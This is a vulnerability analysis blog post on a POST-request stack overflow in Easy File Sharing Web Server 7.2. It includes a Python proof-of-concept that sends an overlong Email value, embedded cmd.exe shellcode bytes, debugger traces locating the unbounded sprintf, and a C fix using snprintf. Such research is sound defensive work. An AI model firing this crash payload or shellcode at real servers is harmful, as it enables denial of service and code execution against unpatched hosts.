Easy File Sharing Web Server 7.2

Introduction

Seeing this software again: wasn't there a buffer overflow in the GET request handling last time?
(My analysis of that one: http://blog.csdn.net/u012763794/article/details/66970749)

This time it is a POST; let's see whether there is anything new in it.

Reference: https://www.exploit-db.com/exploits/42165/

Lab environment

Windows XP SP3 (Chinese edition)
EFS Web Server 7.2
windbg
IDA
mona
python 2.7

Vulnerability analysis

Trim the exploit down to a PoC:

import httplib

server = "127.0.0.1"

# Shellcode to open cmd.exe, carried over from the original exploit;
# this PoC does not use it and only sends the overlong Email value.
shellcode = (
"\x8b\xec\x55\x8b\xec"
"\x68\x65\x78\x65\x2F"
"\x68\x63\x6d\x64\x2e"
"\x8d\x45\xf8\x50\xb8"
"\xc7\x93\xc2\x77"
"\xff\xd0")

payload = "A" * 5000

# Server address and port
httpServ = httplib.HTTPConnection(server, 80)
httpServ.connect()

# POST the overlong Email field to /sendemail.ghp
httpServ.request('POST', '/sendemail.ghp',
    'Email=%s&getPassword=Get+Password' % payload)

response = httpServ.getresponse()

httpServ.close()

First, reproduce the crash:

0:005> g
(1110.1290): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000001 ecx=ffffffff edx=020561b8 esi=02056198 edi=020561b8
eip=61c277f6 esp=02056114 ebp=0205612c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll - 
sqlite3!sqlite3_errcode+0x8e:
61c277f6 81784c97a629a0  cmp     dword ptr [eax+4Ch],0A029A697h ds:0023:4141418d=????????

At a glance it is the same location as last time: sqlite3!sqlite3_errcode+0x8e.

Look at the stack:

0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
0205612c 61c6286c 000013ad 00001388 01568ea4 sqlite3!sqlite3_errcode+0x8e
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
0205616c 004968f4 00000001 00000000 02056198 sqlite3!sqlite3_declare_vtab+0x3282
0205618c 004975a3 020561b0 00000000 0012b9d0 fsws+0x968f4
00000000 00000000 00000000 00000000 00000000 fsws+0x975a3

This looks much the same as last time, so set a breakpoint directly at 0049759E:

0:002> bp 0049759E
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
0:002> bl
 0 e 0049759e     0001 (0001)  0:**** fsws+0x9759e
0:002> g
ModLoad: 719c0000 719fe000   C:\WINDOWS\System32\mswsock.dll
ModLoad: 76ef0000 76f17000   C:\WINDOWS\system32\DNSAPI.dll
ModLoad: 76d30000 76d48000   C:\WINDOWS\system32\iphlpapi.dll
ModLoad: 76f80000 76f88000   C:\WINDOWS\System32\winrnr.dll
ModLoad: 76f90000 76f96000   C:\WINDOWS\system32\rasadhlp.dll
ModLoad: 01a10000 01a20000   C:\WINDOWS\DBFilter.dll
ModLoad: 01a20000 01c4c000   C:\WINDOWS\SurfGd.dll
ModLoad: 60fd0000 61025000   C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 71a00000 71a08000   C:\WINDOWS\System32\wshtcpip.dll
ModLoad: 5fdd0000 5fe24000   C:\WINDOWS\system32\NETAPI32.DLL
ModLoad: 68000000 68036000   C:\WINDOWS\system32\rsaenh.dll
Breakpoint 0 hit
eax=020561b0 ebx=ffffff01 ecx=0205720c edx=020561b8 esi=0205720c edi=01568eec
eip=0049759e esp=02056194 ebp=00000068 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
fsws+0x9759e:
0049759e e82df3ffff      call    fsws+0x968d0 (004968d0)
0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
02056190 020561b0 020561b8 0012b9d0 02057624 fsws+0x9759e
02056194 020561b8 0012b9d0 02057624 ffffffff 0x20561b0
020561b0 01375910 656c6573 2a207463 6f726620 0x20561b8
00000000 00000000 00000000 00000000 00000000 0x1375910
0:005> dc 020561b0 l 100
020561b0  00000000 01375910 656c6573 2a207463  .....Y7.select *
020561c0  6f726620 7173206d 6261746c 7720656c   from sqltable w
020561d0  65726568 616d6520 273d6c69 41414141  here email='AAAA
020561e0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
020561f0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056200  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056210  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056220  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056230  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
02056240  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
...

The first argument passed to the function called at 0049759E points to a SQL statement, and it already contains a lot of the AAAA... we sent.

So when does the stack get filled like this? Set a write breakpoint on 020561e0:

0:005> ba w4 020561e0
0:005> g
Breakpoint 0 hit
eax=00000041 ebx=00001383 ecx=02056160 edx=020561e0 esi=01568e69 edi=02056134
eip=00500df0 esp=02055ebc ebp=02055ebc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
fsws+0x100df0:
00500df0 ff01            inc     dword ptr [ecx]      ds:0023:02056160=020561e0

Sure enough, it is the same thing: this is the write_char function, so the caller above should be sprintf or something similar.

To find out for certain, keep following it; check the stack first:

0:005> kv
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
02055ebc 00500e69 00000041 02056160 02056134 fsws+0x100df0
02056148 004f9698 02056160 005a2859 0205619c fsws+0x100e69
02056180 0049758f 020561b8 005a283c 01374678 fsws+0xf9698
02056184 020561b8 005a283c 01374678 01374358 fsws+0x9758f
02056188 005a283c 01374678 01374358 01568e64 0x20561b8
020561b8 2a207463 6f726620 7173206d 6261746c fsws+0x1a283c
020561bc 6f726620 7173206d 6261746c 7720656c 0x2a207463
020561c0 7173206d 6261746c 7720656c 65726568 0x6f726620
020561c4 6261746c 7720656c 65726568 616d6520 0x7173206d
020561c8 7720656c 65726568 616d6520 273d6c69 0x6261746c
02056220 00000000 00000000 00000000 00000000 COMCTL32!CReBar::_WndProc+0x955 (FPO: [Non-Fpo])

Look up 004f9698 in IDA: it is indeed inside sprintf, the same as in the previous analysis.

.text:004F966A ; int sprintf(char *, const char *, ...)
.text:004F966A _sprintf        proc near               ; CODE XREF: sub_401520+36p
.text:004F966A                                         ; sub_401B70+35p ...
.text:004F966A
.text:004F966A var_20          = FILE ptr -20h
.text:004F966A arg_0           = dword ptr  8
.text:004F966A arg_4           = dword ptr  0Ch
.text:004F966A arg_8           = dword ptr  10h
.text:004F966A
.text:004F966A                 push    ebp
.text:004F966B                 mov     ebp, esp
.text:004F966D                 sub     esp, 20h
.text:004F9670                 mov     eax, [ebp+arg_0]
.text:004F9673                 push    esi
.text:004F9674                 mov     [ebp+var_20._base], eax
.text:004F9677                 mov     [ebp+var_20._ptr], eax
.text:004F967A                 lea     eax, [ebp+arg_8]
.text:004F967D                 mov     [ebp+var_20._flag], 42h
.text:004F9684                 push    eax             ; int
.text:004F9685                 lea     eax, [ebp+var_20]
.text:004F9688                 push    [ebp+arg_4]     ; int
.text:004F968B                 mov     [ebp+var_20._cnt], 7FFFFFFFh
.text:004F9692                 push    eax             ; FILE *
.text:004F9693                 call    sub_500640
.text:004F9698                 add     esp, 0Ch
...

Set a breakpoint before the call to sprintf and inspect the second argument, the format string. It has three %s, so the fifth argument is our Email value, AAAAAA.....

0:005> bp 0049758A
*** WARNING: Unable to verify checksum for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\EFS Software\Easy File Sharing Web Server\fsws.exe
0:005> g
Breakpoint 0 hit
eax=01374678 ebx=ffffff01 ecx=020561b8 edx=01374358 esi=0205720c edi=01568e64
eip=0049758a esp=02056188 ebp=00000068 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
fsws+0x9758a:
0049758a e8db200600      call    fsws+0xf966a (004f966a)
0:005> dd esp
02056188  020561b8 005a283c 01374678 01374358
02056198  01568e64 0012b9d0 02057624 ffffffff
020561a8  01374678 01374358 00000000 01375910
020561b8  0000005c 656c6573 2a207463 6f726620
020561c8  7173206d 6261746c 0020656c 00000000
020561d8  00000000 00000000 00000000 00000000
020561e8  00000000 00000000 00000000 00000000
020561f8  00000000 00000000 00000000 00000000
0:005> dc 005a283c l8
005a283c  656c6573 2a207463 6f726620 7325206d  select * from %s
005a284c  65687720 25206572 25273d73 00002773   where %s='%s'..
0:005> dc 01568e64 
01568e64  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568e74  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568e84  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568e94  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568ea4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568eb4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568ec4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
01568ed4  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA

We can also check the first two %s arguments (01374678 and 01374358 on the stack above):

0:005> dc 01374678  l2
01374678  746c7173 656c6261                    sqltable

The table is indeed sqltable.

Below we can see that the column is email; note the 00 byte that terminates it:

0:005> dc 01374358 l2
01374358  69616d65 452d006c                    email.-E

Exploitation

I have already covered this at length here:
http://blog.csdn.net/u012763794/article/details/66970749

Fix

Use the bounded snprintf, or limit the length of the string.
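The sprintf pattern the analysis recovered, next to the bounded form this section recommends, as an added example in C (not code from the page, the exploit, or EFS Web Server). The buffer size and the function names are assumptions; the format string is the one dumped at 005a283c above.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size; the real size in fsws.exe is not given on the page. */
#define QUERY_BUF 128

/* The format string recovered at 005a283c in the analysis above. */
#define QUERY_FMT "select * from %s where %s='%s'"

/* Vulnerable pattern (hypothetical reconstruction): sprintf cannot know how
 * large buf is, so an overlong email runs past it onto the stack. Shown for
 * contrast only; do not call it with untrusted input. */
int build_query_unbounded(char *buf, const char *table, const char *column,
                          const char *email)
{
    return sprintf(buf, QUERY_FMT, table, column, email);
}

/* Bounded version: snprintf plus a truncation check. Returns the query
 * length, or -1 with an empty buffer when the query would not fit.
 * Bounding fixes the overflow only; the value is still spliced into SQL
 * text, so the statement should be parameterized as well. */
int build_query(char *buf, size_t buflen, const char *table,
                const char *column, const char *email)
{
    if (buf == NULL || buflen == 0)
        return -1;
    int n = snprintf(buf, buflen, QUERY_FMT, table, column, email);
    /* snprintf reports the length the full string would have had, so
     * n >= buflen means truncation. Windows' _snprintf does not NUL-terminate
     * on truncation, so this check is what keeps buf a valid string there. */
    if (n < 0 || (size_t)n >= buflen) {
        buf[0] = '\0';
        return -1;
    }
    return n;
}

/* Input-side limit, the page's other suggestion: reject the field before it
 * reaches the formatter. Returns 1 when strlen(email) <= maxlen. */
int email_length_ok(const char *email, size_t maxlen)
{
    size_t i;
    for (i = 0; i <= maxlen; i++)
        if (email[i] == '\0')
            return 1;
    return 0;
}
```

Fed the PoC's 5000-byte Email value, build_query returns -1 and leaves an empty buffer instead of writing past it.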

Summary

Revisiting this shows that every place in this software that uses sprintf is potentially affected; all you need is a way to trigger it, and exploitation is much the same in each case.
Also, exploitation has some pitfalls whether you overwrite the return address or the SEH record; for more, see the exploitation section of http://blog.csdn.net/u012763794/article/details/66970749.

Original: https://www.cnblogs.com/cnsec/p/13286505.html